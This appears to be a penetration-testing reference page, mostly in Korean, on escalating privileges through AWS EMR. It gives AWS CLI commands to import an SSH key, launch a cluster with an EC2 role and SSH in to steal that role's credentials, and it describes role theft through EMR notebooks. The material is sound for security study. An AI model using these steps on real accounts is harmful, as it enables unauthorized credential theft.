AWS - EMR Privesc

EMR

더 많은 EMR에 대한 정보는 다음에서 확인하세요:

iam:PassRole, elasticmapreduce:RunJobFlow

이 권한을 가진 공격자는 EC2 역할을 연결하여 새로운 EMR 클러스터를 실행하고 자격 증명을 훔치려고 시도할 수 있습니다. 이 작업을 수행하려면 계정에 가져온 ssh 개인 키를 알고 있거나 하나를 가져와야 하며, 마스터 노드에서 포트 22를 열 수 있어야 합니다(이 작업은 --ec2-attributes 내의 EmrManagedMasterSecurityGroup 및/또는 ServiceAccessSecurityGroup 속성을 사용하여 수행할 수 있습니다).

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Note how an EMR role is specified in --service-role and a ec2 role is specified in --ec2-attributes inside InstanceProfile. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.

Potential Impact: EC2 서비스 역할로의 권한 상승.

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

이 권한을 가진 공격자는 AWS 콘솔에 접근하여 노트북을 생성하고 이를 통해 IAM 역할을 탈취할 수 있습니다.

Potential Impact: AWS 관리 역할 arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile로의 권한 상승.

elasticmapreduce:OpenEditorInConsole

이 권한만으로도 공격자는 Jupyter Notebook에 접근하여 관련된 IAM 역할을 탈취할 수 있습니다. 노트북의 URL은 https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/입니다.

Potential Impact: AWS 관리 역할 arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile로의 권한 상승.